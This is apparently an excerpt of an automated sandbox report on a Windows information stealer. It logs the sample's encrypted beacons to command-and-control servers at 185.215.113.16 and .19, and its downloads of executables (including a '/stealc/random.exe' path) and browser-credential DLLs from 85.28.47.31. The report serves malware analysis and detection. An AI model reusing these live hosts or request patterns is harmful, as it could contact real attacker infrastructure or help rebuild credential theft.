Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 85.28.47.31 85.28.47.31
Source: Joe Sandbox View IP Address: 185.215.113.19 185.215.113.19
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: GES-ASRU GES-ASRU
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00405000 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,memcpy,InternetCloseHandle,InternetCloseHandle, 0_2_00405000
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/sqlite3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/freebl3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/mozglue.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/msvcp140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/nss3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/softokn3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/vcruntime140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /soka/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /stealc/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.facebook.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111BDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ?disabled=getCanStageUpdates - unable to apply updates because another instance of the application is already handling updates for this installation.https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=$locale&region=$region&count=30https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111BDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ?disabled=getCanStageUpdates - unable to apply updates because another instance of the application is already handling updates for this installation.https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=$locale&region=$region&count=30https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2954167196.000001B1066E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.2909846838.000001F5FECF0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevation equals www.youtube.com (Youtube)
Source: 8e8f4571c5.exe, 0000001C.00000002.3375734319.0000000005403000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2903172052.0000018A47990000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2952630491.000001B104590000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2903172052.0000018A47990000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account<A{N equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2953298471.000001B104803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account~ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2952598665.000001B104580000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: -os-restarted https://www.youtube.com/accountH equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2996759132.000001B117583000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2989528701.000001B116803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: .S........[tlsflags0x00000000]www.youtube.com:443^partitionKey=%28https%2Cyoutube.com%29 equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2989528701.000001B1168B7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3018521435.000001B11DD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8:https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2955694353.000001B106740000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001F.00000002.2994122055.000001B116B81000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2955694353.000001B106740000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2994122055.000001B116B97000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3000161016.000001B1177A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2987356094.000001B11659D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2988472196.000001B116624000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001F.00000002.2989528701.000001B1168B7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3018521435.000001B11DD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: :https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000003.2909698266.000001B107465000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2959579682.000001B107486000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2909956595.000001B107486000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: =::=::\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2996759132.000001B1175D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: @https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2952630491.000001B104590000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exehttps://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.2909846838.000001F5FECF0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exehttps://www.youtube.com/account--attempting-deelevation equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2903172052.0000018A47990000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exehttps://www.youtube.com/accountzA{ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.2909846838.000001F5FECF0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Windows\system32\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevationC:\Program Files\Mozilla Firefox\firefox.exeWinsta0\Default equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2952630491.000001B104590000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Windows\system32\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/accountC:\Program Files\Mozilla Firefox\firefox.exeWinsta0\Default equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2903172052.0000018A47990000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Windows\system32\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/accountC:\Program Files\Mozilla Firefox\firefox.exewinsta0\defaultxA{ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2903912469.0000018A49530000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: G8p8https://www.youtube.com/account --attempting-deelevationUser equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000003.2910203943.000001B107454000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2909110092.000001B107454000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/account$ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2959579682.000001B1073B0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2910203943.000001B107454000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2909110092.000001B107454000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2953298471.000001B104803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accounthttps://www.youtube.com/account@ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2996759132.000001B1175D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: O^partitionKey=%28https%2Cyoutube.com%29,:https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: 8e8f4571c5.exe, 00000018.00000002.3383993209.0000000006A26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000003.2909414064.000001B111826000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: START_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHRE equals www.youtube.com (Youtube)
